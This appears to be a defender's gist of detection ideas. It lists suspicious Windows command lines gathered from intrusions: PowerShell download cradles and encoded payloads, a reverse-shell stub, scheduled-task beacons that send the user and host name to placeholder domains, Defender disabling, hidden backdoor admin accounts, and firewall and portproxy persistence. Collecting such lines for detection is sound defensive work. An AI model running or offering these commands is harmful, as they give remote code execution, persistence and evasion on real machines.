@JohnLaTwC
Last active January 30, 2023 14:09
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString(...')}"
cmd /c powershell "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event8 Log')))) {IEX(New-Object Net.WebClient).DownloadString(h...
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Windows Events Filter')))) {IEX(New-Object Net.WebClient).DownloadString(...)}"
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Systems Manage Filter')))) {IEX(New-Object Net.WebClient).DownloadString(... ')}"
C:\Windows\system32\cmd.exe /c reg add "HKLM\software\Microsoft\Windows\currentversion\policies\system" /v localaccounttokenfilterpolicy /t REG_DWORD /d 1 /f
cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn <name> /tr "powershell -c '\\\"<domain>\\\",\\\"<domain>\\\",\\\"<domain>\\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\\"DownloadString\\\"(\\\"http://$_/<path>?1.1*$env:username*$env:computername\\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn <name>
// detection evasion
cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(...)
// hide a backdoor account from the logon screen
C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v <account> /t REG_DWORD /d 0 /f
// group manipulation
cmd.exe /c net localgroup administrators <account> /add
C:\Windows\system32\cmd.exe /c net user /add admin <password> && net localgroup Administrators admin /add
// redirection on the command line that indicates a multi-stage payload
cmd.exe /c <filepath> > stage1.txt
cmd.exe /c whoami > <filepath>
// use of LOLBAS for post-compromise commands
cmd /c for /d %i in (<ipv4>:<port> <ipv4>:<port> <ipv4>:<port>) do Msiexec /i http://%i/<hex-digits>.Png /Q
WMIC.exe, rundll32.exe, cscript.exe, msiexec.exe, LOLBAS (lolbas-project.github.io)
schtasks.exe /create /tn Miantenance_init /ru SYSTEM /sc ONSTART /tr "C:\windows\<path>\Maintenance.bat"
// firewall manipulation and persistence
cmd.exe /c netsh.exe firewall add <name> tcp <port> DNS&netsh interface portproxy add <name> listenport=<port> connectaddress=1.1.1.1 connectport=<port>&schtasks /create /ru system /sc MINUTE /mo <mins> /st <hour>:00:00 /tn "<taskname>" /tr "powershell -ep bypass -e "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQ…" /F&net user <account> <password> /ADD && net localgroup administrators <account> /ADD
// redteam/blueteam testing
calc.exe